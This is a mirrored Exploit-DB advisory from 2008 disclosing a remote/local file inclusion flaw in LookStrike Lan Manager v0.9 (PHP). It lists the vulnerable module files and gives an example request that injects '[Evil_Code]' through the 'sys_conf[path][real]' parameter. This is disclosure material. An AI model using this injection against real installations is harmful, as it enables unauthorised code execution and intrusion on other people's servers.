bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5121.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

52 lines
No EOL
2.1 KiB
Text
Raw Blame History

--==+================================================================================+==--
--==+ LookStrike Lan Manager v0.9 Remote\Local File Inclusion +==--
--==+================================================================================+==--
Author: MhZ91
Title: LookStrike Lan Manager v0.9 Remote\Local File Inclusion
Download: http://sourceforge.net/project/showfiles.php?group_id=152660
Bug: Remote\Local File Inclusion
Info: LookStrike is a tool written in PHP that manages Lan Party to gain a lot of time about the management of your Lan. You can also gather statistics of your players. LookStrike generate graphics and matches for tournaments automatically.
Visit: http://www.inj3ct-it.org
[*]----------------------------------------------------------
LookStrike Lan Manager v0.9 present a remote\local file inclusion vulnerability in this file..
modules\class\Table.php
modules\class\db\db_admins.php
modules\class\db\db_alert.php
modules\class\db\db_double.php
modules\class\db\db_games.php
modules\class\db\db_matches.php
modules\class\db\db_match_teams.php
modules\class\db\db_news.php
modules\class\db\db_platform.php
modules\class\db\db_players.php
modules\class\db\db_server_group.php
modules\class\db\db_server_ip.php
modules\class\db\db_teams.php
modules\class\db\db_team_players.php
modules\class\db\db_tournaments.php
modules\class\db\db_tournament_teams.php
modules\class\db\db_trees.php
modules\class\tournament\Match.php
modules\class\tournament\MatchTeam.php
modules\class\tournament\Rule.php
modules\class\tournament\RuleBuilder.php
modules\class\tournament\RulePool.php
modules\class\tournament\RuleSingle.php
modules\class\tournament\RuleTree.php
modules\class\tournament\Tournament.php
modules\class\tournament\TournamentTeam.php
modules\class\tournament\Tree.php
modules\class\tournament\TreeSingle.php
all are exploitable by the variable "sys_conf[path][real]" for example
http://www.example.com/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]
[*]----------------------------------------------------------
# milw0rm.com [2008-02-14]
Reference in a new issue View git blame Copy permalink